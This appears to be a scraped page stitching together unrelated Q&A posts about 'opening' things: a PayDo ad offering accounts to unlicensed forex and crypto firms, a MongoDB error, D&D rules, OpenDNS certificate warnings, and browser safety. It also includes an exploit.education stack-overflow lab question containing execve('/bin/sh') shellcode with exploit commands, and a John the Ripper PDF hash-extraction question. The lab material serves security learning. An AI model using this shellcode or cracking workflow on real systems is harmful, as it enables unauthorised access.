PayDo: Remote European IBAN opening for high-risk business

Hi guys!

We all know that forex trading has a reputation for being a high-risk business. Since many forex business owners provide their services without a license it casts a shadow over the entire industry.

It is difficult for this type of business to obtain a license due to the constantly tightening regulation by supervisory authorities.

But we at PayDo have a solution.

What do we offer?

  • PayDo offers opening a merchant account for forex and crypto…

PayDo: Remote European IBAN opening for high-risk business

An exception occurred while opening a connection to the server

I’ve encountered this from time to time and I cant seem to find the fix.

Usually when this error occur, I am seeing increasing number of connections being used while its connection is not being disconnected.

Here is a sample logs on mongo. Here is the sample below

But I observed that this log below is its normal behaviour: enter image description here

Another thing that I noticed before the error occur is that there are numerous "Unable to gather storage statistics for a slow operation due to lock aquire timeout"enter image description here

At the first time I encountered this issue. We set MaxConnectionPoolSize = 200; then it occurred again. Any idea how to fix this?

Does Mordenkainen’s Private Sanctum prevent me from opening a Portable Hole?

Mordenkainen’s Private Sanctum says that

planar travel is blocked within the warded area

and the portable hole’s description states that

the cylindrical space within the hole exists on a different plane.

Does this mean that portable holes’ contents can’t be accessed within a private sanctum?

Is the cover art of the 1e AD&D module Sinister Secret of Saltmarsh a deliberate homage to the opening credits of Scooby Doo?

The 1e AD&D module U1 Sinister Secret of Saltmarsh has a plot that…

Coincidentally, the cover art of the 1e version of the module by David De Leuw depicts the mansion with bats flying out of it that is quite reminiscent of the spooky mansion with bats in the opening credits of Scooby Doo.

Are there any sources that verify this was a deliberate homage by the artist based on the plot of the module?

Cover art:

Cover of the 1e module

Scooby Doo opening credits:

Scooby Doo opening credits.

“Your connection is not private” for specific website, once when opening a new tab

Like many, since March, I’ve been working from home and using the company’s VPN to do my work.

Recently, if I open a new tab in Chrome, and navigate to "news.bbc.co.uk", I got the aforementioned error, with the supplemental information being:

Attackers might be trying to steal your information from news.bbc.co.uk.x.878874e0029b7043d30ab470050dec81a4e1.9270fd51.id.opendns.com (for example, passwords, messages, or credit cards). Learn more

  • This only happened when I opened a new tab.
  • It did not happen for any other site that I visited, just the BBC.
  • When I opened a new tab, and typed https://news.bbc.co.uk it (correctly) had no issue.
  • After forcing https as above, opening a new tab and just typing news.bbc.co.uk it worked.
  • A few minutes later, just typing news.bbc.co.uk once again causes a Privacy Error.

I was wondering why this is just happening to the BBC site, and no others, and what the redirect URL means (with OpenDNS). When it fails, this is what is in the address bar:

https://news.bbc.co.uk.x.878874e0029b7043d30ab470050dec81a4e1.9270fd51.id.opendns.com/h/news.bbc.co.uk/?X-OpenDNS-Session=_878874e0029b7043d30ab470050dec81a4e19270fd51_eMU5iVa1_

How safe is opening any website on new browser tab?

When I do online shopping where I use my credit card information to purchase, I clear the browser cache, cookies and only open that single site. After I am done, I again clear the cache, cookies and start with my regular browsing. I do this to ensure any other websites that I open on a new tab do not sneak into my credit card information. Is this even possible or just a myth?

So if I wish to open "any" site on a new tab while doing my online shopping, is it safe or do I have to clear cookies every time and open only one site?

Exploit education stack-five: trouble opening shell

Im trying the phoenix vm, challenge stack-five on exploit.education (http://exploit.education/phoenix/stack-five/). I run onto a problem while exploiting a stack overflow. The challenge is run execve(‘/bin/sh’) through shellcode. I grabbed the shellcode from shellstorm (http://shell-storm.org/shellcode/files/shellcode-603.php). The shellcode consists of:

[NOP slide] (debug int3 \xcc) "\x48\x31\xd2"                                  // xor    %rdx, %rdx "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov  $  0x68732f6e69622f2f, %rbx "\x48\xc1\xeb\x08"                              // shr    $  0x8, %rbx "\x53"                                          // push   %rbx "\x48\x89\xe7"                                  // mov    %rsp, %rdi "\x50"                                          // push   %rax "\x57"                                          // push   %rdi "\x48\x89\xe6"                                  // mov    %rsp, %rsi "\xb0\x3b"                                      // mov    $  0x3b, %al "\x0f\x05";                                     // syscall (debug int3 \xcc) [padding] [override rip pointing to the middle of the NOP slide] 

I have tested int3’s before and after the shellcode and all seems fine, they both trigger outside and inside gdb and therefore I infer that the shellcode is being executed but i cannot get the shell open.

I’m using this commands:

cat | /opt/phoenix/amd64/stack-five < exploit 
cat exploit - | /opt/phoenix/amd64/stack-five 

Neither of them gets the shell.

Example of execution

user@phoenix-amd64:~$   cat exploit - | /opt/phoenix/amd64/stack-five cat exploit - | /opt/phoenix/amd64/stack-five Welcome to phoenix/stack-five, brought to you by https://exploit.education [ 7018.986649] traps: stack-five[433] trap int3 ip:7fffffffe68e sp:7fffffffe6c8 error:0 whoami Trace/breakpoint trap 

This int3 is AFTER the shellcode.

Some idea of what’s wrong?

John the Ripper: Cannot extract hash from PDF because Python keeps opening?

I’m having a really strange issue. I’m attempting to extract a hash from a user-password encrypted .pdf with John the Ripper’s pdf2john tool, but every time I run the command:

c:\...\run\pdf2john.pl mypdf.pdf 

My Python IDE (Visual Studio Code) opens up the pdf2john.pl file and the following appears in the command line:

[main 2020-06-18T10:02:06.775Z] update#setState idle (node:15044) Electron: Loading non context-aware native modules in the renderer process is deprecated and will stop working at some point in the future, please see https://github.com/electron/electron/issues/18397 for more information [main 2020-06-18T10:02:36.776Z] update#setState checking for updates [main 2020-06-18T10:02:36.934Z] update#setState downloading 

Any ideas on how to stop my IDE from opening up and having the command actually work as expected? The latest version of Perl is installed on my machine.